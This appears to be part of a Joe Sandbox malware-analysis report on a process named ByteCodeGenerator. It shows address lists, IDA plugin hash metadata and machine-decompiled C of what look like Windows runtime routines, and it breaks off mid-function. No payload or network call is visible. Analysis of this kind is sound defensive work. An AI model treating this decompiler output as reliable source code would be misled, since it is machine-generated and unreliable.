                                  0x0343d7a5
                                  0x0343d866
                                  0x0343d870
                                  0x0343d892
                                  0x0343d898
                                  0x0343d89e
                                  0x0343d8a0
                                  0x0343d8a6
                                  0x0343d8ac
                                  0x0343d8ae
                                  0x0343d8b4
                                  0x0343d8b4
                                  0x0343d8ae
                                  0x0343d7a5
                                  0x0343d78b
                                  0x0343d7b1
                                  0x0348b3c5
                                  0x0348b3c5
                                  0x0343d7c3
                                  0x0343d7ca
                                  0x0343d7e5
                                  0x0343d7eb
                                  0x0343d8eb
                                  0x0343d8ed
                                  0x00000000
                                  0x0343d8f3
                                  0x0343d8f3
                                  0x0343d8f3
                                  0x00000000
                                  0x0343d8ed
                                  0x0343d7cc
                                  0x0343d7cc
                                  0x0343d7d2
                                  0x00000000
                                  0x0343d7d4
                                  0x0343d7d4
                                  0x0343d7d7
                                  0x0343d7df
                                  0x0348b3d4
                                  0x0348b3d9
                                  0x0348b3dc
                                  0x0348b3dc
                                  0x0348b3df
                                  0x0348b3e2
                                  0x0348b468
                                  0x0348b46d
                                  0x0348b46f
                                  0x0348b46f
                                  0x0348b475
                                  0x0343d8f8
                                  0x0343d8f9
                                  0x0343d8fd
                                  0x0348b3e8
                                  0x0348b3e8
                                  0x0348b3eb
                                  0x0348b3ed
                                  0x00000000
                                  0x0348b3ef
                                  0x0348b3ef
                                  0x0348b3f1
                                  0x0348b3f4
                                  0x0348b3fe
                                  0x0348b404
                                  0x0348b409
                                  0x0348b40e
                                  0x0348b410
                                  0x0348b410
                                  0x0348b414
                                  0x0348b414
                                  0x0348b41b
                                  0x0348b420
                                  0x0348b423
                                  0x0348b425
                                  0x0348b427
                                  0x0348b42a
                                  0x0348b42d
                                  0x0348b42d
                                  0x0348b42a
                                  0x0348b432
                                  0x0348b436
                                  0x0348b438
                                  0x0348b43b
                                  0x0348b43b
                                  0x0348b449
                                  0x0348b44e
                                  0x0348b454
                                  0x0348b458
                                  0x0348b458
                                  0x0348b45d
                                  0x00000000
                                  0x0348b45d
                                  0x0348b3ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0343d7df
                                  0x0343d7d2
                                  0x0343d7ca
                                  0x0348b37c
                                  0x0348b37e
                                  0x0348b385
                                  0x0348b38a
                                  0x00000000
                                  0x0348b38a
                                  0x0343d742
                                  0x0343d7f1
                                  0x0343d7f8
                                  0x0348b49b
                                  0x0348b49b
                                  0x0343d800
                                  0x0343d837
                                  0x0343d843
                                  0x0343d845
                                  0x0343d847
                                  0x0343d84a
                                  0x0343d84b
                                  0x0343d84e
                                  0x0343d857
                                  0x0343d818
                                  0x0343d824
                                  0x0343d831
                                  0x0348b4a5
                                  0x0348b4ab
                                  0x0348b4b3
                                  0x0348b4b8
                                  0x0348b4bb
                                  0x00000000
                                  0x0348b4c1
                                  0x0348b4c1
                                  0x0348b4c8
                                  0x00000000
                                  0x0348b4ce
                                  0x0348b4d4
                                  0x0348b4e1
                                  0x0348b4e3
                                  0x0348b4e5
                                  0x00000000
                                  0x0348b4eb
                                  0x0348b4f0
                                  0x0348b4f2
                                  0x0343dac9
                                  0x0343dacc
                                  0x0343dacf
                                  0x0343dad1
                                  0x0343dd78
                                  0x0343dd78
                                  0x0343dcf2
                                  0x00000000
                                  0x0343dad7
                                  0x0343dad9
                                  0x0343dadb
                                  0x00000000
                                  0x00000000
                                  0x0343dae1
                                  0x0343dae1
                                  0x0343dae4
                                  0x0343dae6
                                  0x0348b4f9
                                  0x0348b4f9
                                  0x0348b500
                                  0x0343daec
                                  0x0343daec
                                  0x0343daf5
                                  0x0343daf8
                                  0x0343dafb
                                  0x0343db03
                                  0x0343db11
                                  0x0343db16
                                  0x0343db19
                                  0x0343db1b
                                  0x0348b52c
                                  0x0348b531
                                  0x0348b534
                                  0x0343db21
                                  0x0343db21
                                  0x0343db24
                                  0x0343dcd9
                                  0x0343dce2
                                  0x0343dce5
                                  0x0343dd6a
                                  0x0343dd6d
                                  0x00000000
                                  0x0343dd73
                                  0x0348b51a
                                  0x0348b51c
                                  0x0348b51f
                                  0x0348b524
                                  0x00000000
                                  0x0348b524
                                  0x0343dce7
                                  0x0343dce7
                                  0x0343dce7
                                  0x00000000
                                  0x0343dce7
                                  0x00000000
                                  0x0343db2a
                                  0x0343db2c
                                  0x0343db31
                                  0x0343db33
                                  0x0343db36
                                  0x0343db39
                                  0x0343db3b
                                  0x0343db66
                                  0x0343db66
                                  0x0343db3d
                                  0x0343db3d
                                  0x0343db3e
                                  0x0343db46
                                  0x0343db47
                                  0x0343db49
                                  0x0343db4c
                                  0x0343db53
                                  0x0343db55
                                  0x0343db58
                                  0x0343db5a
                                  0x0348b50a
                                  0x0348b50f
                                  0x0348b512
                                  0x0343db60
                                  0x0343db60
                                  0x0343db63
                                  0x0343db63
                                  0x00000000
                                  0x0343db63
                                  0x0343db5a
                                  0x0343db3b
                                  0x0343db24
                                  0x0343db69
                                  0x0343db69
                                  0x0343db6c
                                  0x0343db6f
                                  0x0343db74
                                  0x0348b557
                                  0x0348b557
                                  0x0348b55e
                                  0x0343db7a
                                  0x0343db7c
                                  0x0343db7f
                                  0x0343db82
                                  0x0343db85
                                  0x00000000
                                  0x0343db8b
                                  0x0343db8b
                                  0x0343db8d
                                  0x0343db9b
                                  0x0343db9b
                                  0x0343db9d
                                  0x0343dba0
                                  0x0343dba2
                                  0x0343dba4
                                  0x0343dba7
                                  0x0343dba9
                                  0x0343dbae
                                  0x0343dbae
                                  0x0343dbb1
                                  0x0343dbb4
                                  0x0343dbb4
                                  0x0343dbb7
                                  0x0343dbba
                                  0x0343dcd2
                                  0x0343dcd4
                                  0x00000000
                                  0x0343dbc0
                                  0x0343dbc0
                                  0x0343dbd2
                                  0x0343dbd7
                                  0x0343dbda
                                  0x0343dbdd
                                  0x0343dbdf
                                  0x00000000
                                  0x0343dbe5
                                  0x0343dbe5
                                  0x0343dbee
                                  0x0343dbf1
                                  0x0348b541
                                  0x0348b544
                                  0x00000000
                                  0x0348b546
                                  0x0348b546
                                  0x00000000
                                  0x0348b546
                                  0x0343dbf7
                                  0x0343dbf7
                                  0x0343dbfd
                                  0x0343dbfd
                                  0x0343dbff
                                  0x0343dc0b
                                  0x0343dc15
                                  0x0343dc1b
                                  0x0343dc1d
                                  0x0343dc21
                                  0x0343dc21
                                  0x0343dc23
                                  0x0343dc23
                                  0x0343dc26
                                  0x0343dc29
                                  0x0343dc2b
                                  0x00000000
                                  0x00000000
                                  0x0343dc31
                                  0x0343dc34
                                  0x0343dc36
                                  0x0343dcbf
                                  0x0343dcbf
                                  0x0343dcc2
                                  0x00000000
                                  0x0343dc3c
                                  0x0343dc41
                                  0x0343dc43
                                  0x00000000
                                  0x0343dc45
                                  0x0343dc45
                                  0x0343dc47
                                  0x00000000
                                  0x0343dc4d
                                  0x0343dc4d
                                  0x0343dc50
                                  0x0343dc52
                                  0x0343dc55
                                  0x0343dcfa
                                  0x0343dcfe
                                  0x0343dd08
                                  0x0343dd0a
                                  0x0343dd0c
                                  0x00000000
                                  0x0343dd12
                                  0x0343dd15
                                  0x0343dd2d
                                  0x0343dd2f
                                  0x0343dd32
                                  0x0343dd35
                                  0x00000000
                                  0x0343dd35
                                  0x0343dc5b
                                  0x0343dc5b
                                  0x0343dc5e
                                  0x0343dc61
                                  0x0343dc64
                                  0x0343dc67
                                  0x0343dc67
                                  0x0343dc6a
                                  0x0343dc6c
                                  0x0343dc8e
                                  0x0343dc8e
                                  0x0343dc91
                                  0x0343dc93
                                  0x0343dcce
                                  0x0343dcce
                                  0x0343dc95
                                  0x0343dc9c
                                  0x0343dc6e
                                  0x0343dc72
                                  0x0343dc75
                                  0x0343dc77
                                  0x0343dc79
                                  0x0348b551
                                  0x0348b551
                                  0x00000000
                                  0x0343dc7f
                                  0x0343dc7f
                                  0x0343dc81
                                  0x00000000
                                  0x0343dc83
                                  0x0343dc86
                                  0x0343dc88
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0343dc88
                                  0x0343dc81
                                  0x0343dc79
                                  0x0343dc6c
                                  0x0343dc55
                                  0x0343dc47
                                  0x0343dc43
                                  0x00000000
                                  0x0343dc36
                                  0x0343dc23
                                  0x00000000
                                  0x0343dbff
                                  0x0343dbf1
                                  0x0343dbdf
                                  0x0343db8f
                                  0x0343db92
                                  0x0343db95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0343db95
                                  0x0343db8d
                                  0x0343db85
                                  0x0343db74
                                  0x0343dc9f
                                  0x0343dca2
                                  0x0343dcb0
                                  0x0343dcb0
                                  0x0343dad1
                                  0x0348b4e5
                                  0x0348b4c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0343d831
                                  0x00000000
                                  0x0343d800
                                  0x0348b47f
                                  0x0348b485
                                  0x00000000
                                  0x0348b485
                                  0x0343d665
                                  0x0343d652
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e28b6ecea18515920d706e59685a41cb3ab70563c86b051cb8a1917beacee06
                                  • Instruction ID: 9dacfbe41be864e4a96013060317e7dc9d18a3fa6dffdce22af5bad0b7b5d701
                                  • Opcode Fuzzy Hash: 9e28b6ecea18515920d706e59685a41cb3ab70563c86b051cb8a1917beacee06
                                  • Instruction Fuzzy Hash: 69E19F34A003598FEB24EB19C944B6EB7B5BF4B304F0801AAD8195F3A0D774A986CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0343849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                  				void* _t136;
                                  				signed int _t139;
                                  				signed int _t141;
                                  				signed int _t145;
                                  				intOrPtr _t146;
                                  				signed int _t149;
                                  				signed int _t150;
                                  				signed int _t161;
                                  				signed int _t163;
                                  				signed int _t165;
                                  				signed int _t169;
                                  				signed int _t171;
                                  				signed int _t194;
                                  				signed int _t200;
                                  				void* _t201;
                                  				signed int _t204;
                                  				signed int _t206;
                                  				signed int _t210;
                                  				signed int _t214;
                                  				signed int _t215;
                                  				signed int _t218;
                                  				void* _t221;
                                  				signed int _t224;
                                  				signed int _t226;
                                  				intOrPtr _t228;
                                  				signed int _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				void* _t237;
                                  				void* _t238;
                                  
                                  				_t236 = __esi;
                                  				_t235 = __edi;
                                  				_t193 = __ebx;
                                  				_push(0x70);
                                  				_push(0x34ff9c0);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                  				if( *0x3517b04 == 0) {
                                  					L4:
                                  					goto L5;
                                  				} else {
                                  					_t136 = E0343CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                  					_t236 = 0;
                                  					if(_t136 < 0) {
                                  						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                  					}
                                  					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                  						_t193 =  *( *[fs:0x30] + 0x18);
                                  						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                  						 *(_t237 - 0x68) = _t236;
                                  						 *(_t237 - 0x6c) = _t236;
                                  						_t235 = _t236;
                                  						 *(_t237 - 0x60) = _t236;
                                  						E03442280( *[fs:0x30], 0x3518550);
                                  						_t139 =  *0x3517b04; // 0x1
                                  						__eflags = _t139 - 1;
                                  						if(__eflags != 0) {
                                  							_t200 = 0xc;
                                  							_t201 = _t237 - 0x40;
                                  							_t141 = E0345F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                  							 *(_t237 - 0x44) = _t141;
                                  							__eflags = _t141;
                                  							if(_t141 < 0) {
                                  								L50:
                                  								E0343FFB0(_t193, _t235, 0x3518550);
                                  								L5:
                                  								return E0347D130(_t193, _t235, _t236);
                                  							}
                                  							_push(_t201);
                                  							_t221 = 0x10;
                                  							_t202 =  *(_t237 - 0x40);
                                  							_t145 = E03421C45( *(_t237 - 0x40), _t221);
                                  							 *(_t237 - 0x44) = _t145;
                                  							__eflags = _t145;
                                  							if(_t145 < 0) {
                                  								goto L50;
                                  							}
                                  							_t146 =  *0x3517b9c; // 0x0
                                  							_t235 = L03444620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                  							 *(_t237 - 0x60) = _t235;
                                  							__eflags = _t235;
                                  							if(_t235 == 0) {
                                  								_t149 = 0xc0000017;
                                  								 *(_t237 - 0x44) = 0xc0000017;
                                  							} else {
                                  								_t149 =  *(_t237 - 0x44);
                                  							}
                                  							__eflags = _t149;
                                  							if(__eflags >= 0) {
                                  								L8:
                                  								 *(_t237 - 0x64) = _t235;
                                  								_t150 =  *0x3517b10; // 0x0
                                  								 *(_t237 - 0x4c) = _t150;
                                  								_push(_t237 - 0x74);
                                  								_push(_t237 - 0x39);
                                  								_push(_t237 - 0x58);
                                  								_t193 = E0345A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                  								 *(_t237 - 0x44) = _t193;
                                  								__eflags = _t193;
                                  								if(_t193 < 0) {
                                  									L30:
                                  									E0343FFB0(_t193, _t235, 0x3518550);
                                  									__eflags = _t235 - _t237 - 0x38;
                                  									if(_t235 != _t237 - 0x38) {
                                  										_t235 =  *(_t237 - 0x48);
                                  										L034477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                  									} else {
                                  										_t235 =  *(_t237 - 0x48);
                                  									}
                                  									__eflags =  *(_t237 - 0x6c);
                                  									if( *(_t237 - 0x6c) != 0) {
                                  										L034477F0(_t235, _t236,  *(_t237 - 0x6c));
                                  									}
                                  									__eflags = _t193;
                                  									if(_t193 >= 0) {
                                  										goto L4;
                                  									} else {
                                  										goto L5;
                                  									}
                                  								}
                                  								_t204 =  *0x3517b04; // 0x1
                                  								 *(_t235 + 8) = _t204;
                                  								__eflags =  *((char*)(_t237 - 0x39));
                                  								if( *((char*)(_t237 - 0x39)) != 0) {
                                  									 *(_t235 + 4) = 1;
                                  									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                  									_t161 =  *0x3517b10; // 0x0
                                  									 *(_t237 - 0x4c) = _t161;
                                  								} else {
                                  									 *(_t235 + 4) = _t236;
                                  									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                  								}
                                  								 *((intOrPtr*)(_t237 - 0x54)) = E034637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                  								_t224 = _t236;
                                  								 *(_t237 - 0x40) = _t236;
                                  								 *(_t237 - 0x50) = _t236;
                                  								while(1) {
                                  									_t163 =  *(_t235 + 8);
                                  									__eflags = _t224 - _t163;
                                  									if(_t224 >= _t163) {
                                  										break;
                                  									}
                                  									_t228 =  *0x3517b9c; // 0x0
                                  									_t214 = L03444620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                  									 *(_t237 - 0x78) = _t214;
                                  									__eflags = _t214;
                                  									if(_t214 == 0) {
                                  										L52:
                                  										_t193 = 0xc0000017;
                                  										L19:
                                  										 *(_t237 - 0x44) = _t193;
                                  										L20:
                                  										_t206 =  *(_t237 - 0x40);
                                  										__eflags = _t206;
                                  										if(_t206 == 0) {
                                  											L26:
                                  											__eflags = _t193;
                                  											if(_t193 < 0) {
                                  												E034637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                  												__eflags =  *((char*)(_t237 - 0x39));
                                  												if( *((char*)(_t237 - 0x39)) != 0) {
                                  													 *0x3517b10 =  *0x3517b10 - 8;
                                  												}
                                  											} else {
                                  												_t169 =  *(_t237 - 0x68);
                                  												__eflags = _t169;
                                  												if(_t169 != 0) {
                                  													 *0x3517b04 =  *0x3517b04 - _t169;
                                  												}
                                  											}
                                  											__eflags = _t193;
                                  											if(_t193 >= 0) {
                                  												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                  											}
                                  											goto L30;
                                  										}
                                  										_t226 = _t206 * 0xc;
                                  										__eflags = _t226;
                                  										_t194 =  *(_t237 - 0x48);
                                  										do {
                                  											 *(_t237 - 0x40) = _t206 - 1;
                                  											_t226 = _t226 - 0xc;
                                  											 *(_t237 - 0x4c) = _t226;
                                  											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                  											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                  												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                  												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                  													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                  													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                  													__eflags =  *((char*)(_t237 - 0x39));
                                  													if( *((char*)(_t237 - 0x39)) == 0) {
                                  														_t171 = _t210;
                                  													} else {
                                  														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                  														L034477F0(_t194, _t236, _t210 - 8);
                                  														_t171 =  *(_t237 - 0x50);
                                  													}
                                  													L48:
                                  													L034477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                  													L46:
                                  													_t206 =  *(_t237 - 0x40);
                                  													_t226 =  *(_t237 - 0x4c);
                                  													goto L24;
                                  												}
                                  												 *0x3517b08 =  *0x3517b08 + 1;
                                  												goto L24;
                                  											}
                                  											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                  											__eflags = _t171;
                                  											if(_t171 != 0) {
                                  												__eflags =  *((char*)(_t237 - 0x39));
                                  												if( *((char*)(_t237 - 0x39)) == 0) {
                                  													goto L48;
                                  												}
                                  												E034657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                  												goto L46;
                                  											}
                                  											L24:
                                  											__eflags = _t206;
                                  										} while (_t206 != 0);
                                  										_t193 =  *(_t237 - 0x44);
                                  										goto L26;
                                  									}
                                  									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                  									 *(_t237 - 0x7c) = _t232;
                                  									 *(_t232 - 4) = _t214;
                                  									 *(_t237 - 4) = _t236;
                                  									E0346F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                  									_t238 = _t238 + 0xc;
                                  									 *(_t237 - 4) = 0xfffffffe;
                                  									_t215 =  *(_t237 - 0x48);
                                  									__eflags = _t193;
                                  									if(_t193 < 0) {
                                  										L034477F0(_t215, _t236,  *(_t237 - 0x78));
                                  										goto L20;
                                  									}
                                  									__eflags =  *((char*)(_t237 - 0x39));
                                  									if( *((char*)(_t237 - 0x39)) != 0) {
                                  										_t233 = E0345A44B( *(_t237 - 0x4c));
                                  										 *(_t237 - 0x50) = _t233;
                                  										__eflags = _t233;
                                  										if(_t233 == 0) {
                                  											L034477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                  											goto L52;
                                  										}
                                  										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                  										L17:
                                  										_t234 =  *(_t237 - 0x40);
                                  										_t218 = _t234 * 0xc;
                                  										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                  										 *(_t218 + _t235 + 0x10) = _t236;
                                  										_t224 = _t234 + 1;
                                  										 *(_t237 - 0x40) = _t224;
                                  										 *(_t237 - 0x50) = _t224;
                                  										_t193 =  *(_t237 - 0x44);
                                  										continue;
                                  									}
                                  									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                  									goto L17;
                                  								}
                                  								 *_t235 = _t236;
                                  								_t165 = 0x10 + _t163 * 0xc;
                                  								__eflags = _t165;
                                  								_push(_t165);
                                  								_push(_t235);
                                  								_push(0x23);
                                  								_push(0xffffffff);
                                  								_t193 = E034696C0();
                                  								goto L19;
                                  							} else {
                                  								goto L50;
                                  							}
                                  						}
                                  						_t235 = _t237 - 0x38;
                                  						 *(_t237 - 0x60) = _t235;
                                  						goto L8;
                                  					}
                                  					goto L4;
                                  				}
                                  			}

































                                  0x0343849b
                                  0x0343849b
                                  0x0343849b
                                  0x0343849b
                                  0x0343849d
                                  0x034384a2
                                  0x034384a7
                                  0x034384b1
                                  0x034384d8
                                  0x00000000
                                  0x034384b3
                                  0x034384c4
                                  0x034384c9
                                  0x034384cd
                                  0x034384cf
                                  0x034384cf
                                  0x034384d6
                                  0x034384e6
                                  0x034384e9
                                  0x034384ec
                                  0x034384ef
                                  0x034384f2
                                  0x034384f4
                                  0x034384fc
                                  0x03438501
                                  0x03438506
                                  0x03438509
                                  0x034386e0
                                  0x034386e5
                                  0x034386e8
                                  0x034386ed
                                  0x034386f0
                                  0x034386f2
                                  0x03489afd
                                  0x03489b02
                                  0x034384da
                                  0x034384df
                                  0x034384df
                                  0x034386fa
                                  0x034386fd
                                  0x034386fe
                                  0x03438701
                                  0x03438706
                                  0x03438709
                                  0x0343870b
                                  0x00000000
                                  0x00000000
                                  0x03438711
                                  0x03438725
                                  0x03438727
                                  0x0343872a
                                  0x0343872c
                                  0x03489af0
                                  0x03489af5
                                  0x03438732
                                  0x03438732
                                  0x03438732
                                  0x03438735
                                  0x03438737
                                  0x03438515
                                  0x03438515
                                  0x03438518
                                  0x0343851d
                                  0x03438523
                                  0x03438527
                                  0x0343852b
                                  0x03438537
                                  0x03438539
                                  0x0343853c
                                  0x0343853e
                                  0x0343868c
                                  0x03438691
                                  0x03438699
                                  0x0343869b
                                  0x03438744
                                  0x03438748
                                  0x034386a1
                                  0x034386a1
                                  0x034386a1
                                  0x034386a4
                                  0x034386a8
                                  0x03489bdf
                                  0x03489bdf
                                  0x034386ae
                                  0x034386b0
                                  0x00000000
                                  0x034386b6
                                  0x00000000
                                  0x03489be9
                                  0x034386b0
                                  0x03438544
                                  0x0343854a
                                  0x0343854d
                                  0x03438551
                                  0x0343876e
                                  0x03438778
                                  0x0343877b
                                  0x03438780
                                  0x03438557
                                  0x03438557
                                  0x0343855d
                                  0x0343855d
                                  0x0343856b
                                  0x0343856e
                                  0x03438570
                                  0x03438573
                                  0x03438576
                                  0x03438576
                                  0x03438579
                                  0x0343857b
                                  0x00000000
                                  0x00000000
                                  0x03438581
                                  0x034385a0
                                  0x034385a2
                                  0x034385a5
                                  0x034385a7
                                  0x03489b1b
                                  0x03489b1b
                                  0x0343862e
                                  0x0343862e
                                  0x03438631
                                  0x03438631
                                  0x03438634
                                  0x03438636
                                  0x03438669
                                  0x03438669
                                  0x0343866b
                                  0x03489bbf
                                  0x03489bc4
                                  0x03489bc8
                                  0x03489bce
                                  0x03489bce
                                  0x03438671
                                  0x03438671
                                  0x03438674
                                  0x03438676
                                  0x03489bae
                                  0x03489bae
                                  0x03438676
                                  0x0343867c
                                  0x0343867e
                                  0x03438688
                                  0x03438688
                                  0x00000000
                                  0x0343867e
                                  0x03438638
                                  0x03438638
                                  0x0343863b
                                  0x0343863e
                                  0x0343863f
                                  0x03438642
                                  0x03438645
                                  0x03438648
                                  0x0343864d
                                  0x03489b69
                                  0x03489b6e
                                  0x03489b7b
                                  0x03489b81
                                  0x03489b85
                                  0x03489b89
                                  0x03489ba7
                                  0x03489b8b
                                  0x03489b91
                                  0x03489b9a
                                  0x03489b9f
                                  0x03489b9f
                                  0x03438788
                                  0x0343878d
                                  0x03438763
                                  0x03438763
                                  0x03438766
                                  0x00000000
                                  0x03438766
                                  0x03489b70
                                  0x00000000
                                  0x03489b70
                                  0x03438656
                                  0x0343865a
                                  0x0343865c
                                  0x03438752
                                  0x03438756
                                  0x00000000
                                  0x00000000
                                  0x0343875e
                                  0x00000000
                                  0x0343875e
                                  0x03438662
                                  0x03438662
                                  0x03438662
                                  0x03438666
                                  0x00000000
                                  0x03438666
                                  0x034385b7
                                  0x034385b9
                                  0x034385bc
                                  0x034385bf
                                  0x034385cc
                                  0x034385d1
                                  0x034385d4
                                  0x034385db
                                  0x034385de
                                  0x034385e0
                                  0x03489b5f
                                  0x00000000
                                  0x03489b5f
                                  0x034385e6
                                  0x034385ea
                                  0x034386c3
                                  0x034386c5
                                  0x034386c8
                                  0x034386ca
                                  0x03489b16
                                  0x00000000
                                  0x03489b16
                                  0x034386d6
                                  0x034385f6
                                  0x034385f6
                                  0x034385f9
                                  0x03438602
                                  0x03438606
                                  0x0343860a
                                  0x0343860b
                                  0x0343860e
                                  0x03438611
                                  0x00000000
                                  0x03438611
                                  0x034385f3
                                  0x00000000
                                  0x034385f3
                                  0x03438619
                                  0x0343861e
                                  0x0343861e
                                  0x03438621
                                  0x03438622
                                  0x03438623
                                  0x03438625
                                  0x0343862c
                                  0x00000000
                                  0x0343873d
                                  0x00000000
                                  0x0343873d
                                  0x03438737
                                  0x0343850f
                                  0x03438512
                                  0x00000000
                                  0x03438512
                                  0x00000000
                                  0x034384d6

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9557f60ec54c9c27834b14a5fdd9e757bd60815af122360acb33474d937ef7b9
                                  • Instruction ID: 27eebb623ea6566c30d19725fde70c379699314b2eced6e75d1cec9f75efef51
                                  • Opcode Fuzzy Hash: 9557f60ec54c9c27834b14a5fdd9e757bd60815af122360acb33474d937ef7b9
                                  • Instruction Fuzzy Hash: BEB149B4E00309DFDB14DFA9C980AAEFBB9BF49304F14412AE415AF355D770A94ACB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0345513A(intOrPtr __ecx, void* __edx) {
                                  				signed int _v8;
                                  				signed char _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				char _v63;
                                  				char _v64;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				signed int _v84;
                                  				signed int _v88;
                                  				signed char* _v92;
                                  				signed int _v100;
                                  				signed int _v104;
                                  				char _v105;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t157;
                                  				signed int _t159;
                                  				signed int _t160;
                                  				unsigned int* _t161;
                                  				intOrPtr _t165;
                                  				signed int _t172;
                                  				signed char* _t181;
                                  				intOrPtr _t189;
                                  				intOrPtr* _t200;
                                  				signed int _t202;
                                  				signed int _t203;
                                  				char _t204;
                                  				signed int _t207;
                                  				signed int _t208;
                                  				void* _t209;
                                  				intOrPtr _t210;
                                  				signed int _t212;
                                  				signed int _t214;
                                  				signed int _t221;
                                  				signed int _t222;
                                  				signed int _t226;
                                  				intOrPtr* _t232;
                                  				signed int _t233;
                                  				signed int _t234;
                                  				intOrPtr _t237;
                                  				intOrPtr _t238;
                                  				intOrPtr _t240;
                                  				void* _t245;
                                  				signed int _t246;
                                  				signed int _t247;
                                  				void* _t248;
                                  				void* _t251;
                                  				void* _t252;
                                  				signed int _t253;
                                  				signed int _t255;
                                  				signed int _t256;
                                  
                                  				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                  				_v8 =  *0x351d360 ^ _t255;
                                  				_v32 = _v32 & 0x00000000;
                                  				_t251 = __edx;
                                  				_t237 = __ecx;
                                  				_t212 = 6;
                                  				_t245 =  &_v84;
                                  				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                  				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                  				_v48 = __ecx;
                                  				_v36 = _t207;
                                  				_t157 = memset(_t245, 0, _t212 << 2);
                                  				_t256 = _t255 + 0xc;
                                  				_t246 = _t245 + _t212;
                                  				if(_t207 == 2) {
                                  					_t247 =  *(_t237 + 0x60);
                                  					_t208 =  *(_t237 + 0x64);
                                  					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                  					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                  					_v104 = _t159;
                                  					_v76 = _t159;
                                  					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                  					_v100 = _t160;
                                  					_v72 = _t160;
                                  					L19:
                                  					_v80 = _t208;
                                  					_v84 = _t247;
                                  					L8:
                                  					_t214 = 0;
                                  					if( *(_t237 + 0x74) > 0) {
                                  						_t82 = _t237 + 0x84; // 0x124
                                  						_t161 = _t82;
                                  						_v92 = _t161;
                                  						while( *_t161 >> 0x1f != 0) {
                                  							_t200 = _v92;
                                  							if( *_t200 == 0x80000000) {
                                  								break;
                                  							}
                                  							_t214 = _t214 + 1;
                                  							_t161 = _t200 + 0x10;
                                  							_v92 = _t161;
                                  							if(_t214 <  *(_t237 + 0x74)) {
                                  								continue;
                                  							}
                                  							goto L9;
                                  						}
                                  						_v88 = _t214 << 4;
                                  						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                  						_t165 = 0;
                                  						asm("adc eax, [ecx+edx+0x7c]");
                                  						_v24 = _t165;
                                  						_v28 = _v40;
                                  						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
